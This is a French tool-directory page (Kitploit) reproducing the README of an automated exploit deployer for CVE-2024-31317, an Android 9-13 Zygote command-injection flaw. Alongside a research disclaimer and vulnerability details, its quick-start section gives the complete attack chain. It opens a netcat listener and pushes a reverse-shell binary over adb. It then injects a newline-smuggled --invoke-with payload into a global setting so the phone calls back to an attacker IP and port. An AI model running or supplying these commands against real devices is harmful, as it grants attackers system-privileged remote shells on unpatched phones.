Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-31317-Deployer — Outil de déploiement automatisé pour CVE-2024-31317, une vulnérabilité d'injection de commandes dans Android 9-13. Inclut une charge utile de shell inversé, un script de compilation et une analyse technique pour la recherche et l'éducation en sécurité. | Kitploit
Outils/GitHubGitHub/kalibb/cve-2024-31317-deployer
Sécurité AndroidAnalyse des VulnérabilitésExploitationSécurité MobileCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de Binaires

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
kalibb/cve-2024-31317-deployer

CVE-2024-31317-Deployer

Outil de déploiement automatisé pour CVE-2024-31317, une vulnérabilité d'injection de commandes dans Android 9-13. Inclut une charge utile de shell inversé, un script de compilation et une analyse technique pour la recherche et l'éducation en sécurité.

Voir le dépôt
12il y a 7 moisPas encore vérifié

CVE-2024-31317 Deployer

License Android Status

🔒 Déclaration de recherche en sécurité

Ce projet est destiné uniquement à la recherche en sécurité et à des fins éducatives. L'utilisation de cet outil pour des tests non autorisés est illégale. L'auteur décline toute responsabilité en cas d'abus ou de dommages.

📋 Vue d'ensemble

CVE-2024-31317 est une vulnérabilité de sécurité critique affectant les appareils Android 9 à Android 13, permettant à une application disposant de la permission WRITE_SECURE_SETTINGS d'obtenir une exécution avec les privilèges système via une injection de commande.

Ce projet fournit une analyse technique détaillée de cette vulnérabilité, un code de preuve de concept (PoC) ainsi qu'un outil de déploiement automatisé.

✨ Principales fonctionnalités

  • 📱 Prise en charge de toutes les versions Android 9-13
  • 🛠️ Scripts de déploiement automatisés
  • 🔄 Connexion reverse shell
  • 📊 Documentation technique détaillée
  • 🎯 Conception modulaire

🐛 Détails de la vulnérabilité

  • CVE ID: CVE-2024-31317
  • Type de vulnérabilité: Injection de commande
  • Niveau de gravité: Élevé (High)
  • Score CVSS: 7.8
  • Composant affecté: Processus Zygote d'Android
  • État du correctif: Corrigé dans le correctif de sécurité Android de juin 2024

🎯 Périmètre d'impact

Versions affectées

  • ✅ Android 9-13

Versions non affectées

  • ❌ Android 14+ (corrigé)
  • ❌ Appareils ayant installé le correctif de sécurité de juin 2024 ou plus récent

📁 Structure du projet

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 Démarrage rapide

1. Cloner le projet

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. Compiler le payload

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. Déployer

root@kitploit:~
# 启动监听器
nc -lvnp 4444

# 推送并执行
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# 注入payload
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# 触发漏洞
adb shell stop && adb shell start

📚 Documentation

  • Analyse technique approfondie
  • Instructions d'utilisation du payload
  • Tutoriel d'utilisation complet

⚠️ Avertissement

Ce projet est destiné uniquement à la recherche en sécurité et à des fins éducatives. En utilisant cet outil, vous acceptez :

  • de respecter toutes les lois et réglementations applicables
  • de l'utiliser uniquement à des fins de recherche en sécurité légitime
  • d'assumer l'entière responsabilité de vos actions

📜 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE

👨‍💻 Auteur

fcy10012 - GitHub

🙏 Remerciements

Projet de référence : WebLDix/CVE-2024-31317-PoC-Deployer


⭐ Si ce projet vous a été utile, merci de lui laisser une étoile !

Télécharger l’outil